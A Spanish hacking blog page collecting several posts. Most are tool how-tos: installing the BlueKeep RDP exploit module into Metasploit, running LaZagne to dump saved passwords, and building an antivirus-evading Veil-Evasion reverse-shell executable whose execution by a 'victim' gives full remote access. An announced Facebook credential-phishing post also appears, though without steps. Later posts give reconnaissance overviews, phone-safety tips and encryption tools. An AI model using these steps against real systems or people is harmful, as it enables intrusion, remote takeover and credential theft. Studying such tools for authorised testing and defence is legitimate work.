Hacking Ético, Seguridad Informática, RedTeam, Pentesting.

Mostrando entradas con la etiqueta protección. Mostrar todas las entradas
Mostrando entradas con la etiqueta protección. Mostrar todas las entradas

miércoles, 23 de octubre de 2019

BLUEKEEP CVE-2019-0708 INSTALACIÓN Y USO


BlueKeep CVE-2019-0708


Metasploit lanzo hace días en un módulo de explotación pública inicial para CVE-2019-0708 , también conocido como BlueKeep, como una solicitud de extracción en Metasploit Framework. El módulo de explotación se dirige a las versiones de 64 bits de Windows 7 y Windows 2008 R2. El módulo se basa en el código de prueba de concepto de Metasploit contributor @ zerosum0x0 , quien también contribuyó con el módulo de escáner BlueKeep de Metasploit y los módulos de escáner y exploit para EternalBlue . El exploit de Metasploit utiliza una biblioteca mejorada de protocolos RDP de propósito general , así como capacidades mejoradas de huellas dactilares RDP, los cuales beneficiarán a los usuarios y contribuyentes de Metasploit mucho más allá del contexto del escaneo y la explotación de BlueKeep.
Como proyecto de código abierto, uno de los principios rectores de Metasploit es que el conocimiento es más poderoso cuando se comparte. El acceso democrático a las capacidades de los atacantes, incluidos los exploits, es fundamental para los defensores, especialmente aquellos que confían en herramientas de código abierto para comprender y mitigar el riesgo de manera efectiva.
Actualmente solo funciona en modo “manual”, lo que significa que necesita la interacción del usuario para ejecutarse correctamente.


INSTALACIÓN

Para agregar el exploit a Metasploit he usado y probado de dos maneras las cuales les detallare a continuación.

PRIMER MÉTODO

Antes de empezar asegurate de tener metasploit y tu Kali Actualizado.
Clonamos el repositorio que se encuentra en GitHub movemos los archivos a las siguientes carpetas. otra opción es descargarlos desde acá Link.

El archivo rdp.rb lo movemos a la siguiente ruta.
cp ./rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb    

El archivo rdp_scanner.rb lo movemos a la siguiente ruta.
cp./rdp_scanner.rb/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

El archivo cve_2019_0708_bluekeep.rb lo movemos a la siguiente ruta.
cp./cve_2019_0708_bluekeep.rb/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

El archivo cve_2019_0708_bluekeep_rce.rb lo movemos a la siguiente ruta.
cp./cve_2019_0708_bluekeep_rce.rb/usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Abrimos Metasploit y ejecutamos el siguiente comando y ya tendríamos el modulo y sus componentes instalado.

msf5> reload_all

SEGUNDO MÉTODO

Clonamos el repositorio de metasploit y abrimos la carpeta.
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework

Luego ejecutamos los siguientes comando para la configuración de dicho módulo.
git fetch origin pull/12283/head:bluekeep
git checkout bluekeep

Instalamos las dependencias necesarias.
gem install bundler && bundle

Si en el transcurso de la instalacion o configuracion sale error lo solucionamos con los siguientes comandos.
apt-get install libpq-dev
apt-get install libpcap-dev

ya con esto tendríamos instalado y configurado Metasploit y el módulo BlueKeep.

Nota: Si faltase alguna dependencia o herramienta extra instalarla manualmente.






 Video explotacion a sistema Windows 7  x64 


martes, 11 de octubre de 2016

Que es y como usar Lazagne


Que es y como usar Lazagne 

The LaZagne project

Que es:

Es una aplicación de código abierto que se utiliza para recuperar un montón de contraseñas almacenadas en un equipo local. Cada software almacena sus contraseñas usando diversas técnicas (texto plano, APIs, algoritmos personalizados, bases de datos, etc.). Esta herramienta se ha desarrollado con el fin de encontrar estas contraseñas para el software más comúnmente utilizada.

Uso:

recuperar la versión
laZagne.exe --version

Poner en marcha todos los módulos
laZagne.exe all

Lanzar solamente un módulo específico
laZagne.exe browsers

Sólo lanzar una secuencia de comandos de software específicos
laZagne.exe browsers -f (for firefox)

Escribe todas las contraseñas que se encuentran en un archivo (txt para -oN normal, -oj para JSON, -oA para Todos)
laZagne.exe all -oN

Consigue ayuda
laZagne.exe -h
laZagne.exe browsers -h

Cambiar el modo de verbosidad (2 niveles diferentes)
laZagne.exe all -vv


Descargarlo desde aquí web oficial 

lo puedes usar desde windows , de la siguiente forma:
tienes que abrir el "cmd" y buscar la dirección donde lo descargaste luego colocas lazgne.exe
ejemplo:

C:\Users\usuarioejemplo\Desktop\LaZagne\windows\LaZagne.exe 

y desde linux clonas el repositorio o descargas el archivo, luego buscas la ruta donde lo clonaste o lo descargaste, abres una terminal colocas la ruta y a disfrutar.
ejemplo:

root@usuario: /LaZagne/Linux/src/ python LaZagne.py

lunes, 10 de octubre de 2016

Libro Metasploit para Pentesters. 2ª Edición

10/10/2016 11:48:00 a. m. Posted by Secpronet , , , , , , , , No hay comentarios

Metasploit para Pentesters. 2ª Edición



Les traigo otro libro recomendado.

Resumen:

Metasploit es una de las herramientas más utilizadas en procesos de pentesting ya que contempla distintas fases de un test de intrusión. Con el presente libro se pretende obtener una visión global de las fases en las que Metasploit puede ofrecer su potencia y flexibilidad al servicio del hacking ético.El libro presenta de una manera ordenada la organización un tanto caótica de la arquitectura de Metasploit. Esto subsana lo que habitualmente supone una dificultad a los auditores de seguridad que necesiten utilizar el framework. El enfoque eminentemente práctico, mediante la escenificación de pruebas de concepto, guiará al lector a través de un gran número de posibilidades, para que de esta manera consiga asentar sus conocimientos en el framework y disponer así de distintos recursos para realizar distintas fases de un test de intrusión con la ayuda de Metasploit Framework.



sábado, 16 de julio de 2016

Como usad Dmitry (Recopilación de información)

DMitry
Recopilación de información



Para que sirve 

Dmitry tiene la capacidad de reunir la mayor cantidad de información posible acerca de un host. funcionalidad de base es capaz de reunir posibles subdominios, direcciones de correo electrónico, información del tiempo de actividad, escaneo de puertos TCP, las búsquedas de whois, y más.


Opciones de búsqueda

-i nos permite realizar una búsqueda whois de la dirección IP de un host.
-w realizará una búsqueda whois sobre el nombre de dominio.
-n nos dará información Netcraft
-s realiza una búsqueda de posibles subdominios
-e realizará una búsqueda de direcciones de correo electrónico posibles.


"Para ver los demás comandos debes de colocar en la cosola los siguinte "Dmitry" y te saldrán las de mas opciones "
Como usarlo

Para modelo de ejemplo se usara lo siguiente 

dmitry google.com -e -n -s -i -w 

 





Espero le haya sido útil.  

lunes, 15 de febrero de 2016

Obtener Credenciales de una cuenta de facebook

2/15/2016 12:42:00 a. m. Posted by Secpronet , , , , , , No hay comentarios
                           Obtener Credenciales de una cuenta de facebook 


Todo el mundo se queja de que les han hackeado su cuenta de Facebook y quieren recuperarla. Hoy en dia, esto se ha convertido en un problema bastante grande debido a la falta de conocimiento sobre como funcionan las cosas

Esta vez les enseñare a obtener las credenciales de un persona en facebook, el método es phishing. 

así que que comencemos:



lunes, 18 de enero de 2016

INSTALAR VEIL EVASION EN KALI LINUX 2.0

INSTALAR VEIL EVASION EN KALI LINUX 2.0 


Te enseñare de una forma raída y sencilla como instalar esta poderosa herramienta, comencemos 


actualizamos los repositorios con este comando 

 apt-get update

luego procedemos a instalar veil con el siguiente comando 

apt-get install veil

si de esta forma no nos deja instalarlo lo clonamos de la siguiente forma 

git clone https://github.com/Veil-Framework/Veil-Evasion

luego de esto procedemos a ejecutar el setup.sh de la siguiente forma en mi caso la ruta es la siguiente
.
cd /root/Veil-Evasion/setup/setup.sh

pedirá que instalemos python, pywin, pycrypto lo cual aremos lo típico siguiente siguiente e instalar. 

Esperaremos a que termine de instalar y aremos los siguiente. ejecutamos veil de la siguiente forma, tenemos que estar en el directorio o la carpeta de veil. 

./veil-evasion.py

y por ultimo tendremos esto:



espero que te sea útil este post.






viernes, 15 de enero de 2016

HACKEAR WINDOWS 10 CON VEIL EVASION Y METASPLOIT KALI LINUX 2.0

HACKEAR WINDOWS 10 CON VEIL EVASION Y METASPLOIT


En la actualidad los sistemas operativos se han actualizado y han tendido demasiado auge entre los usuarios, Windows ha actualizado su sistema operativo y con ello los millones de usuarios que ya lo están usando, ha tenido pros y contras.

Sabiendo que no todos los sistemas son seguros, Windows no es la excepción, bueno como lo dice el título acá te enseñare cómo hacerlo paso a paso, así que comencemos.

Lo primero que tenemos que haces es irnos a la terminal y colocar lo siguiente tenemos que tener instalado Veil-Evasion buscamos la ruta donde lo tenemos instaldo en mi caso seria cd /usr/share/veil-evasion luego lo ejecutamos con este código  ./Veil-Evasion.py


nos llevara a esta pantalla 


luego con el comando use escogemos el payload a usar nos arrojara un listado de payloads disponibles en  este caso escogeré el 5 c/meterpreter/rev_tcp  


nos queda de esta forma 


configuramos nuestro LHOST Y LPORT seria de la siguiente forma  set LHOST  y tu ip y set LPORT y el puerto que quedara en escucha


luego con el comando generate  crearemos el payload nos pedirá que le coloquemos un nombre al payload en mi caso le colocare aplicación esperamos u momento y nos dará la ruta donde se encuentra  seria /var/lib/veil-evasion/output/compiled  y allí estará el .exe


quedara así 


luego ejecutamos metasploit configuraremos los siguiente
use multi/handler
usaremos este payload
set payload Windows/meterpreter/reverse_tcp
configuramos la ip y el Puerto de la siguiente forma
set Lhost y la ip que pusimos anteriormente
set Lport y el puerto que pusimos anteriormente
y de ultimo exploit
nos quedara todo de la siguiente forma


al momento que la victima ejecute el archivo, tendremos una sesión de meterpreter abierta 


obtendremos acceso total a la maquina





espero que te sea útil y te allá gustado. 



"EL MEJOR SISTEMA OPERATIVO EL CEREBRO " 




miércoles, 16 de diciembre de 2015

Que es y como funciona Foca

FOCA



Descripción

FOCA (Fingerprinting Organizations with Collected Archives) es una herramienta utilizada principalmente para encontrar metadatos e información oculta en los documentos que examina. Estos documentos pueden estar en páginas web, y con FOCA se pueden descargar y analizar.


COMO FUNCIONA

 Las técnicas utilizadas  son:

Web Search

DNS Search

Resolución IP

PTR Scanning

Bing IP

Common names

DNS Prediction

Robtex

Características

 Con FOCA es posible realizar múltiples ataques y técnicas de análisis como:

Extracción de metadatos.

Análisis de red.

DNS Snooping.

Búsqueda de ficheros comunes.

Juicy files.

Búsqueda de proxys.

Reconocimiento de tecnologías.

Fingerprinting.

Leaks.

Búsqueda de backups.

Forzado de errores.


Búsqueda de directorios abiertos



"RECUERDA NO TODOS LOS SISTEMAS SON 100% SEGUROS"

domingo, 13 de diciembre de 2015

Protege Tu Smartphone y tus Datos

12/13/2015 10:28:00 p. m. Posted by Secpronet , , , , , , No hay comentarios
Protege Tu Smartphone y tus Datos

Dado que con el paso del tiempo los teléfonos móviles han venido evolucionando de maneras muy significativa así las debemos de tener en cuenta que con ella se ha venido generando nuevos sistemas operativos para móviles donde el usuario interactúa mas con el móvil y es necesario la introducción de datos personales del usuario, con esto vienen creciendo los piratas informáticos que buscan la vulnerabilidad de los sistemas operativos para cometer actos ilícitos como robo de identidad, cuentas bancarias y sobretodo información personal para esto se recomienda  que haga varios ejemplos para asegurarse de robo de información.



Gran parte de nuestras vidas está en nuestros celulares y es fundamental que tomemos las medidas necesarias para proteger nuestra privacidad. Gran parte de casos de robo información es por perdida de nuestros móviles, dados estos casos es necesario o recomendable mantener nuestros datos en la nube con cuentas que nos proporcionan como gmail, o los de Windows pone  de esta manera podemos evitar el robo de nuestra información del móvil perdido cambiando la contraseña o usuario que estaba registrado en el dispositivo.




Una segunda opción sería mantener nuestros contactos guardados en el sim no en la memoria del teléfono, dado el caso de pérdida podemos ir a nuestros proveedores o compañías a que nos bloqueen el sim perdido y recuperar el número.

Mantén tu móvil con copias de seguridad a diario. Si eres usuario Android Revisa que tengas activado en tu móvil la opción de sacar copias de seguridad de Gmail en caso de pérdida del móvil para mantener seguros tus archivos foto y videos.

Si eres usuario de WhindowsPhone pone es recomendable que generes una tu cuenta de ONEDRIVE en el móvil y actives la opción de guardar todos tus archivos en la nube cada vez que tomes fotos videos archivos de texto etc, automáticamente serás dirigidos a tu cuenta de Onedrive siempre que dispongas de datos para que los archivos sean procesados.




Consejos para evitar el robo de información

Instalar aplicaciones o software de las paginas oficiales del proveedor como Android desde Play Store.

Instalar antivirus que sea confiable que detecte los virus y fijarnos que no sea una aplicación de publicidad.

Desconectar o apagar los datos del móvil cuando no estén en uso ya que muchos softwares maliciosos roban la información cuando el usuario mantiene el dispositivo sin uso.

Mantener nuestras contraseñas siempre actualizadas no usar la misma para toda la vida cambia a cierto tiempo ya que puedes dejar sesiones abiertas por error el algún otro dispositivo, esto evitara que tus sesiones sigan en uso en otros dispositivos.

Activar opciones de seguridad que te brindan las redes sociales como ejemplo. 

notificaciones de cesiones abiertas o de publicidad no echa por el usuario.

Evitar subir o enviar contenido personal a persona desconocidas.

Hacer copias de seguridad para restablecer el dispositivo en caso de fallos del mismo.
Una de las causas de robo de información son las descargas de aplicaciones no importando de si se descarga desde la página oficial o fuera de la misma tal es el caso de Android que varias aplicaciones piden permisos innecesarios o que no tienen nada que ver con la aplicación a descargar esto puede ser que se trata de una aplicación maliciosa que pretende robar información.





"PROTEGER TUS DATOS ES IMPORTANTE"

domingo, 1 de noviembre de 2015

Protección de Datos y Contraseñas

11/01/2015 06:49:00 p. m. Posted by Secpronet , , , , , No hay comentarios

PROTEGE TUS ARCHIVOS Y DATOS

El principal método para que mantener a salvo tus datos e información privada es evitar que nadie tenga acceso.


Te presentamos algunas alternativas independientes para que decidas cuál te conviene.


Cifrado de Windows (Bitlocker)

Está desarrollado por Microsoft y está incluido por defecto en las versiones Ultimate y Enterprise desde Windows Vista en adelante. Permite mantener a salvo todo, desde documentos hasta contraseñas.

ya lo trae predeterminado windows.



My Lockbox

Es una aplicación que nos permite tener una carpeta oculta y protegida con contraseña de una manera fácil y rápida.Disponible para Windows XP, Windows Server 2003, Windows Vista, Windows 7, Windows 8.

Cloudfogger

Es una herramienta de fácil uso que permite cifrar automáticamente los ficheros contenidos en las carpetas Disponible para: Windows 2000, Windows XP, Windows Vista, Windows 7, Mac Os de 10.4 en adelante, Android a partir de 2.2, iOS a partir de 4.3.



                      Camouflage
no sólo proteges el fichero o carpeta con contraseña, también lo oculta para que parezca una inocente fotografía en vez de un documento importante. Hace mucho que no se actualiza, pero sigue funcionando como el primer día, y además es una manera original y diferente de mantener a salvo datos confidenciales y archivos delicados.

Twisted Pear Productions

TrueCrypt
Este programa crea una unidad virtual en la que puedes colocar todos tus archivos y carpetas a proteger. Ofrece varios algoritmos de cifrado, para que elijas el más adecuado con ayuda de la explicación que acompaña a cada uno.